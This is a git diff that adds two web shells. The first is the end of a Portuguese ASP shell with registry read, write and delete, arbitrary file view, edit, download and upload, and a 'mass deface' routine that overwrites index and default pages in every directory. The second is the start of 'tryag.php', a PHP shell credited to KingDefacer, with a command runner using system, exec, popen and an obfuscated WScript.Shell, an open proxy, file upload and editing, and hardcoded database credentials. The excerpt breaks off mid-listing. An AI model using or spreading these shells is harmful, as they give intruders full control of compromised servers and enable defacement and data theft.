+					Response.Write "<OPTION VALUE=""4"">REG_EXPAND_SZ </option>"
+					Response.Write "<OPTION VALUE=""5"">REG_MULTI_SZ </option></select><br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""w"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes""></td></tr>"
+					Response.Write "<tr><td></td><td><input type=""submit"" value=""OK""></form></td></tr></table>"
+					Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+				End If
+			Case "r"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					Response.Write "<font face=""arial"" size=""2"">" & Trim(Request.QueryString("key")) & "<br>"
+					Response.Write "Valor: <b>" & WshShell.RegRead (Trim(Request.QueryString("key")))
+				Else
+					Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
+					Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> <br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""r"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
+					Response.Write "<input type=""submit"" value=""OK""></form>"
+				End If
+				Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+			Case "d"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					teste = WshShell.RegDelete (Trim(Request.QueryString("key")))
+					Response.Write "Chave <b>" & Trim(Request.QueryString("key")) & " </b>deletada"
+				Else
+					Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
+					Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""d"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
+					Response.Write "<input type=""submit"" value=""OK""></form>"
+				End If
+				Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+			Case Else
+				Response.Write "<font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=w"">ESCREVER CHAVE</a><br><br>"
+				Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=r"">LER CHAVE</a><br><br>"
+				Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=d"">DELETAR CHAVE</a><br>"
+		End Select
+		Set WshShell = Nothing
+	Case "txtview"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp & "<font face=""arial"" size=""2"">"
+		file = Replace(Trim(Request.QueryString("file")),"|","\")
+		Set fso = CreateObject("Scripting.FileSystemObject")  
+		Set a = fso.OpenTextFile(file)
+		Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
+		Set a = Nothing
+		Set fso = Nothing
+	Case "txtedit"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Request.Form.Count = 0 Then
+			file = Replace(Trim(Request.QueryString("file")),"|","\")
+			Set fso = CreateObject("Scripting.FileSystemObject")
+			Set a = fso.OpenTextFile(file)
+			Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
+			Response.Write "<textarea cols='85' rows='25' name=""content"" wrap=""physical"" >" & Server.HTMLEncode(a.ReadAll) & "</textarea><br>"
+			Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("file")) & """>"
+			Response.Write "<input type=""submit"" name=""savemethod"" value=""Save"">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=""submit"" name=""savemethod"" value=""Save as""></form>"
+			Set a = Nothing
+			Set fso = Nothing
+		Else
+			Select Case Trim(Request.Form("savemethod"))
+				Case "Save"
+					Set fso = CreateObject("Scripting.FileSystemObject")
+					novotexto = Trim(Request.Form("content"))
+					novotexto = Split(novotexto,vbCrLf)
+					Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2)
+					For i = 0 To UBound(novotexto)
+						objstream.WriteLine(novotexto(i))
+					Next
+					objstream.Close
+					Set objstream = Nothing
+					Response.Write "Texto salvo: <b>" & Replace(Trim(Request.Form("path")),"|","\") & "</b>"
+				Case "Save as"
+					Set fso = CreateObject("Scripting.FileSystemObject")
+					novotexto = Trim(Request.Form("content"))
+					novotexto = Split(novotexto,vbCrLf)
+					caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
+					Set objstream = fso.CreateTextFile(caminho,true,false)
+					For i = 0 To UBound(novotexto)
+						objstream.WriteLine(novotexto(i))
+					Next
+					objstream.Close
+					Set objstream = Nothing
+					Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
+					Response.Write "<input type=""text"" name=""filename"" value=""" & showobj(Replace(Trim(Request.Form("path")),"|","\")) & """><br>"
+					Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.Form("path")) & """>"
+					Response.Write "<input type=""submit"" name=""savemethod2"" value=""Save""></form>"
+				Case Else
+					caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
+					Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+					Set MyFile = ObjFSO.GetFile(caminho)
+					destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename"))
+					MyFile.Move (destino)
+					If Err.Number = 0 Then
+						Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & destino & "</b> salvo!"
+						Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+					End If	
+			End Select
+		End If
+	Case "download"
+		Response.Buffer = True
+		Response.Clear
+		strFileName = Replace(Trim(Request.QueryString("file")),"|","\")
+		strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\"))
+		strFileType = Request.QueryString("type")
+		if strFileType = "" then strFileType = "application/download"
+		Set fso = Server.CreateObject("Scripting.FileSystemObject")
+		Set f = fso.GetFile(strFilename)
+		intFilelength = f.size
+		Set f = Nothing
+		Set fso = Nothing
+		Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile
+		Response.AddHeader "Content-Length", intFilelength
+		Response.Charset = "UTF-8"
+		Response.ContentType = strFileType
+		Set Stream = Server.CreateObject("ADODB.Stream")
+		Stream.Open
+		Stream.type = 1
+		Stream.LoadFromFile strFileName
+		Response.BinaryWrite Stream.Read
+		Response.Flush
+		Stream.Close
+		Set Stream = Nothing
+	Case "upload"
+		If Request.QueryString("processupload") <> "yes" Then
+			Response.Write "<FORM METHOD=""POST"" ENCTYPE=""multipart/form-data"" ACTION=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&processupload=yes&path=" & Request.QueryString("path") & """>"
+			Response.Write "<TABLE BORDER=0>"
+			Response.Write "<tr><td><font face=""arial"" size=""2""><b>Select a file to upload:</b><br><INPUT TYPE=FILE SIZE=50 NAME=""FILE1""></td></tr>"
+			Response.Write "<tr><td align=""center""><font face=""arial"" size=""2""><INPUT TYPE=SUBMIT VALUE=""Upload!""></td></tr>"
+			Response.Write "</TABLE>"
+		Else
+			Set Uploader = New FileUploader
+			Uploader.Upload()
+			If Uploader.Files.Count = 0 Then
+				Response.Write "File(s) not uploaded."
+			Else
+				For Each File In Uploader.Files.Items
+					File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\")
+					Response.Write "File Uploaded: " & File.FileName & "<br>"
+					Response.Write "Size: " & File.FileSize & " bytes<br>"
+					Response.Write "Type: " & File.ContentType & "<br><br>"
+					Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+				Next
+			End If
+		End If
+	Case "mass"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo)
+			On Error Resume Next
+			Set MonRep = ObjFSO.GetFolder(caminhodomass)
+			Set ColFolders = MonRep.SubFolders
+			for each folderItem in ColFolders
+				destino1 = folderItem.path & "\index.htm"
+				destino2 = folderItem.path & "\index.html"
+				destino3 = folderItem.path & "\index.asp"
+				destino4 = folderItem.path & "\index.cfm"
+				destino5 = folderItem.path & "\index.php"
+				destino6 = folderItem.path & "\default.htm"
+				destino7 = folderItem.path & "\default.html"
+				destino8 = folderItem.path & "\default.asp"
+				destino9 = folderItem.path & "\default.cfm"
+				destino10 = folderItem.path & "\default.php"
+				MeuArquivo.Copy(destino1)
+				MeuArquivo.Copy(destino2)
+				MeuArquivo.Copy(destino3)
+				MeuArquivo.Copy(destino4)
+				MeuArquivo.Copy(destino5)
+				MeuArquivo.Copy(destino6)
+				MeuArquivo.Copy(destino7)
+				MeuArquivo.Copy(destino8)
+				MeuArquivo.Copy(destino9)
+				MeuArquivo.Copy(destino10)
+				Response.Write "<table><tr><td><font face='arial' size='2'>&lt;DIR&gt; " & folderItem.path & "</td>"
+				If Err.Number = 0 Then
+					Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>DONE!</font></td></tr>"
+				Else
+					Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr></table>"
+				End If
+				Err.Number = 0
+				Response.Flush
+				If metodo = "brute" Then
+					Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo)
+				End If
+			next
+		End Sub
+		Sub brutemass(caminho,massaction)
+			If massaction = "test" Then
+				On Error Resume Next
+				Set MonRep = ObjFSO.GetFolder(caminho)
+				Set ColFolders = MonRep.SubFolders
+				Set ColFiles0 = MonRep.Files
+				for each folderItem in ColFolders
+					Set TotalFolders = ObjFSO.GetFolder(folderItem.path)
+					Set EachFolder = TotalFolders.SubFolders
+					Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+					maindestino = folderItem.path & "\"
+					MeuArquivo.Copy(maindestino)
+					Response.Write "<tr><td><b><font face='arial' size='2'>&lt;DIR&gt; " & maindestino & "</b></td>"
+					If Err.Number = 0 Then
+						Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+					Else
+						Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+					End If
+					Err.Number = 0
+					Response.Flush
+					If EachFolder.count > 0 Then
+						masscontador = 0
+						for each subpasta in EachFolder
+							masscontador = masscontador + 1
+							destino = subpasta.path & "\"
+							If masscontador = 1 Then
+								destinofinal = destino
+								pathfinal = subpasta.path
+								Err.Number = 0
+								MeuArquivo.Copy(destinofinal)
+								Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(pathfinal) & "</td>"
+								If Err.Number = 0 Then
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+								Else
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+								End If
+								Err.Number = 0
+								Response.Flush
+							Else
+								MeuArquivo.Copy(destino)
+								Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(subpasta.path) & "</td>"
+								If Err.Number = 0 Then
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
+								Else
+									Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
+								End If
+								Err.Number = 0
+								Response.Flush
+							End If
+						next
+						masscontador = 0
+					End If
+					Response.Write "</table><br>"
+					Call brutemass(folderItem.path & "\","test")
+				next
+				Set MonRep = Nothing
+				Set ColFolders = Nothing
+				Set ColFiles0 = Nothing
+			Else
+				If Request.Form.Count = 0 Then
+					Response.Write "<font face=""arial"" size=""2""><br><br><b>Brute:</b> copia os arquivos do deface para todas as pastas e subpastas (todos os níveis) do diretório escolhido (mais demorado). O tempo do deface vai variar de acordo com o numero TOTAL de diretórios.<br><br>"
+					Response.Write "<b>Single:</b> copia os arquivos do deface apenas para as pastas (primeiro nível) do diretório escolhido. Não inclui subpastas.<br><br>"
+					Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc"">"
+					Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>"
+					Response.Write "<center><font face=""arial"" size=""2"">Insira o código:<br>"
+					Response.Write "<textarea cols='65' rows='15' name=""content""></textarea><br>"
+					Response.Write "<input type=""radio"" name=""massopt"" value=""brute"" checked>Brute&nbsp;&nbsp;&nbsp;"
+					Response.Write "<input type=""radio"" name=""massopt"" value=""single"">Single<br>"
+					Response.Write "<input type=""submit"" value=""w00t!""></center>"
+					Response.Write "</form>"
+				Else
+					Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+					patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+					arquivomassdfc = patharquivotxt & "teste.txt"
+					Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False)
+					vetordelinhas = Split(Request.Form("content"),VbCrLf)
+					For i = 0 To UBound(vetordelinhas)
+						Arquivotxt.WriteLine(vetordelinhas(i))
+					Next
+					Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc)
+					
+					If Request.Form("massopt") = "single" Then
+						Call themassdeface(caminho,"single",ObjFSO,MeuArquivo)
+					ElseIf Request.Form("massopt") = "brute" Then
+						Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo)
+					End If
+				End If
+			End If
+		End Sub
+		If Trim(Request.QueryString("massact")) = "test" Then
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+			arquivo = patharquivotxt & "_vti_cnf.log"
+			Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True)
+			Set MeuArquivo = ObjFSO.GetFile(arquivo)
+			Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test")
+		ElseIf Trim(Request.QueryString("massact")) = "dfc" Then
+			Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc")
+		End If
+	Case Else
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Call showcontent()
+End Select
+If Err.Number <> 0 Then
+	Response.Write "<br><font face='arial' size='2'>ERRO: " & Err.Number & "<br><br><b>" & UCase(Err.Description) & "</b><br>Acesse o <b>ONLINE HELP</b> para a explicação do erro"
+End If
+Response.Write endcode
+%>
diff --git a/php/tryag.php b/php/tryag.php
new file mode 100644
index 0000000..9c77b6a
--- /dev/null
+++ b/php/tryag.php
@@ -0,0 +1,1521 @@
+
+<?php 
+/******************************************************************************************************/ 
+/*  Tryag.php - Edited By KingDefacer
+/*  ??U?E C??C?? C???E?: 
+/*  by: 1.0 (03.10.2006) 
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ 
+/*   
+/* 
+/*  KingDefacer@msn.com
+/******************************************************************************************************/ 
+/* ~~~ C?I?C?CE | C?I?C?CE  ~~~ */ 
+
+// ?EOU?? ???E C???? C???? C? E????? | Authentification 
+// $auth = 1; - C???? ?C?I ?EOU?? C???? C????  ( authentification = On  ) 
+// $auth = 0; - C???? ??? ?E???? C???? C???? ( authentification = Off ) 
+$auth = 1; 
+
+//  (Login & Password for access) 
+// !!! (CHANGE THIS!!!) 
+//  md5, C?EC???I ?C????? ?E? EO????? EUU 'tryag' 
+// Login & password crypted with md5, default is 'tryag' 
+$name='7c7f0f5f0f9e774ec437e1077e6c84a7'; // C????? C??O??  (user login) 
+$pass='7c7f0f5f0f9e774ec437e1077e6c84a7'; // C?EC???I C??O?? (user password) 
+/******************************************************************************************************/ 
+if($auth == 0) { 
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) 
+   { 
+   header('WWW-Authenticate: Basic realm="??? ?C?? ?C???E??"'); 
+   header('HTTP/1.0 401 Unauthorized'); 
+   exit("<b><a href=http://>tryag-team</a> : C?II?? ?U ???O E??C? ??? :)</b>"); 
+   } 
+} 
+?> 
+
+
+<html> 
+<head> 
+<title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>
+<body bgcolor="#000000"> 
+<table Width='100%' height='10%' bgcolor='#AA0000' border='1'> 
+<tr> 
+<td><center><font size='6' color='#BBB516'></font></center></td> 
+</tr> 
+</table> 
+<style type="text/css"> 
+body, td { 
+    font-family: "Tahoma"; 
+    font-size: "12px"; 
+    line-height: "150%"; 
+} 
+.smlfont { 
+    font-family: "Tahoma"; 
+    font-size: "11px"; 
+} 
+.INPUT { 
+    FONT-SIZE: "12px"; 
+    COLOR: "#000000"; 
+    BACKGROUND-COLOR: "#FFFFFF"; 
+    height: "18px"; 
+    border: 1px solid #666666 none; 
+    padding-left: "2px" 
+} 
+.redfont { 
+    COLOR: "#A60000"; 
+} 
+a:link, a:visited, a:active { 
+    color: "#FF0000"; 
+    text-decoration: underline; 
+} 
+a:hover { 
+    color: "#FFFFFF"; 
+    text-decoration: none; 
+} 
+.top {BACKGROUND-COLOR: "#AA0000"} 
+.firstalt {BACKGROUND-COLOR: "#000000"} 
+.secondalt {BACKGROUND-COLOR: "#000000"} 
+</style> 
+<SCRIPT language=JavaScript> 
+function CheckAll(form) { 
+    for (var i=0;i<form.elements.length;i++) { 
+        var e = form.elements[i]; 
+        if (e.name != 'chkall') 
+        e.checked = form.chkall.checked; 
+    } 
+} 
+function really(d,f,m,t) { 
+    if (confirm(m)) { 
+        if (t == 1) { 
+            window.location.href='?dir='+d+'&deldir='+f; 
+        } else { 
+            window.location.href='?dir='+d+'&delfile='+f; 
+        } 
+    } 
+} 
+</SCRIPT> 
+</head> 
+
+<body> 
+<center> 
+
+<hr width="775" noshade> 
+<table width="775" border="0" cellpadding="0"> 
+<?PHP 
+
+
+
+error_reporting(7); 
+ob_start(); 
+$mtime = explode(' ', microtime()); 
+$starttime = $mtime[1] + $mtime[0]; 
+$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals'); 
+if ($onoff != 1) { 
+    @extract($_POST, EXTR_SKIP); 
+    @extract($_GET, EXTR_SKIP); 
+} 
+$mohajer =  getcwd(); 
+$self = $_SERVER['PHP_SELF']; 
+$dis_func = get_cfg_var("disable_functions"); 
+
+/////////////////////////////// 
+                             // 
+$mysql_use = "no"; //"yes"   // 
+$mhost = "localhost";        // 
+$muser = "mjalnet_mjal";       // 
+$mpass = "99080806";               // 
+$mdb = "mjalnet_vb";         // 
+                             // 
+/////////////////////////////// 
+
+
+if (get_magic_quotes_gpc()) { 
+    $_GET = stripslashes_array($_GET); 
+    $_POST = stripslashes_array($_POST); 
+} 
+
+
+
+if (empty($_POST['phpinfo'] )) { 
+    }else{ 
+    echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo()"; 
+    exit; 
+} 
+
+
+if (isset($_POST['url'])) { 
+    $proxycontents = @file_get_contents($_POST['url']); 
+    echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>»?E? URL ??E?E§°U</b></p></center></body>"; 
+    exit; 
+} 
+
+if  (empty($_POST['TrYaG'] ) ) { 
+    }ELSE{ 
+    $action = '?action=TrYaG'; 
+    echo "<table Width='100%' height='10%' bgcolor='#000000' border='1'><tr><td><center><font size='6' color='#BBB516'> 
+C??C?? C???E?<br><br> 
+020 <br><br> 
+C???C??22 <br><br> 
+CE????C? <br><br> 
+??CE? U?? <br><br> 
+cRiMiNaL NeT <br><br> 
+MR.WOLF <br><br> 
+?EIC???00 <br><br> 
+????I ???  <br><br> 
+?C?? C????I <br><br> 
+al3iznet <br><br> 
+C???O C??C??<br><br> 
+???? C????? ????UE <br><br> 
+??U?E C??C?? C???E? &  E??C? C???E  <br><br> 
+www.CyberGrup.Org/vb <br><br> 
+???? EC???? E? C??? ?I? C?C??  ???? C??? ?? <br><br>"; 
+   
+
+    echo "</font></center></td></tr></table> "; 
+
+    exit; 
+    } 
+if  (empty($_POST['command'] ) ) { 
+    }ELSE{ 
+    if (substr(PHP_OS, 0, 3) == 'WIN') { 
+        $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe"; 
+        $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt"; 
+
+        echo "</form>\n"; 
+    } 
+$tb = new FORMS; 
+
+$tb->tableheader(); 
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td><b>'.$mohajer.'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top'); 
+$tb->tdbody("<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value='  dir  '  id=input><INPUT type='submit'name='TrYaG' value='TrYaG Team'  id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>"); 
+$tb->tablefooter(); 
+$tb->tableheader(); 
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>command [ system , shell_exec , passthru , Wscript.Shell , exec , popen ]</b></td></tr></table>','center','top'); 
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>'); 
+
+$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen'); 
+$tb->headerform(array('content'=>'<FONT COLOR=RED>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit'))); 
+
+    echo"<tr class='secondalt'><td align='center'><textarea name='textarea' cols='100' rows='25' readonly>"; 
+
+        if  ($_POST['command'] )  { 
+
+        if ($execfunc=="system") { 
+            system($_POST['command']); 
+        } elseif ($execfunc=="passthru") { 
+            passthru($_POST['command']); 
+        } elseif ($execfunc=="exec") { 
+            $result = exec($_POST['command']); 
+            echo $result; 
+        } elseif ($execfunc=="shell_exec") { 
+            $result=shell_exec($_POST['command']); 
+            echo $result; 
+        } elseif ($execfunc=="popen") { 
+            $pp = popen($_POST['command'], 'r'); 
+            $read = fread($pp, 2096); 
+            echo $read; 
+            pclose($pp); 
+        } elseif ($execfunc=="wscript") { 
+            $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed"); 
+            $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command'].""); 
+            $stdout = $exec->StdOut(); 
+            $stroutput = $stdout->ReadAll(); 
+            echo $stroutput; 
+        } else { 
+            system($_POST['command']); 
+        } 
+
+    } 
+
+echo"</textarea></td></tr></form></table>"; 
+        exit; 
+}//end shell 
+
+if ($_POST['editfile']){ 
+$fp = fopen($_POST['editfile'], "r"); 
+$filearr = file($_POST['editfile']); 
+
+foreach ($filearr as $string){ 
+
+$content = $content . $string; 
+} 
+
+echo "<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUEST_URI' method='POST'><textarea name=content cols=122 rows=20>";echo htmlentities($content); echo"</textarea>"; 
+echo"<input type='hidden' name='dir' value='" . getcwd() ."'> 
+<input type='hidden' name='savefile' value='{$_POST['editfile']}'><br> 
+<input type='submit' name='submit' value='Save'></form></center>"; 
+
+fclose($fp); 
+} 
+
+
+if($_POST['savefile']){ 
+
+$fp = fopen($_POST['savefile'], "w"); 
+$content = stripslashes($content); 
+fwrite($fp, $content); 
+fclose($fp); 
+echo "<center><div id=logostrip>Successfully saved!</div></center>"; 
+
+} 
+if ($doupfile) { 
+    echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "EI?«?E?¦!" : "EI?«E§°U!"; 
+} 
+
+
+elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { 
+    if (!empty($newdirectory)) { 
+        $mkdirs="$dir/$newdirectory"; 
+        if (file_exists("$mkdirs")) { 
+            echo "can't make dir"; 
+        } else { 
+            echo (@mkdir("$mkdirs",0777)) ? "ok" : ""; 
+            @chmod("$mkdirs",0777); 
+        } 
+    } 
+} 
+
+///////// 
+$pathname=str_replace('\\','/',dirname(__FILE__)); 
+
+//////// 
+if (!isset($dir) or empty($dir)) { 
+    $dir = "."; 
+    $nowpath = getPath($pathname, $dir); 
+} else { 
+    $dir=$_post['dir']; 
+    $nowpath = getPath($pathname, $dir); 
+} 
+
+/////// 
+$dir_writeable = (dir_writeable($nowpath)) ? "m" : "mm"; 
+$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : ""; 
+$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\"mohajer22</a>" : ""; 
+
+$tb = new FORMS; 
+
+$tb->tableheader(); 
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td><b>'.$mohajer.'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top'); 
+$tb->tdbody("<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'><INPUT type='submit' name='Rifrish' value='  dir  '  id=input><INPUT type='submit'name='TrYaG' value='TrYaG Team'  id=input><INPUT type='submit' name='phpinfo' value='PHPinfo' id=input><INPUT type='submit' name='shell' value='command shill' id=input></form>"); 
+$tb->tablefooter(); 
+$tb->tableheader(); 
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>Editfile or make & Uploud file & Make directory</b></td></tr></table>','center','top'); 
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>'); 
+$tb->headerform(array('content'=>'<FONT COLOR=RED>File to edit or make:</FONT>'.$tb->makehidden('dir',  getcwd()  ).' '.$tb->makeinput('editfile').' '.$tb->makeinput('Edit','editfile','','submit'))); 
+
+
+$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'<FONT COLOR=RED>Uploud file:</FONT>'.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','up','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); 
+
+$tb->headerform(array('content'=>'<FONT COLOR=RED>Make directory:</FONT> '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','newdirectory','','submit'))); 
+$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen'); 
+$tb->headerform(array('content'=>'<FONT COLOR=RED>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit'))); 
+
+$tb->tdbody ("</td></tr></table>"); 
+if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { 
+
+
+    $tb->tableheader(); 
+echo"<tr bgcolor='#AA0000'><td align='center' nowrap width='27%'><b>DIR</b></td><td align='center' nowrap width='16%'><b>First data</b></td><td align='center' nowrap width='16%'><b>Last data</b></td><td align='center' nowrap width='11%'><b>Size</b></td><td align='center' nowrap width='6%'><b>Perm</b></td></tr>"; 
+
+$dirs=@opendir($dir); 
+$dir_i = '0'; 
+while ($file=@readdir($dirs)) { 
+    $filepath="$dir/$file"; 
+    $a=@is_dir($filepath); 
+    if($a=="1"){ 
+        if($file!=".." && $file!=".")    { 
+            $ctime=@date("Y-m-d H:i:s",@filectime($filepath)); 
+            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); 
+            $dirperm=substr(base_convert(fileperms($filepath),10,8),-4); 
+            echo "<tr class=".getrowbg().">\n"; 
+            echo "  <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n"; 
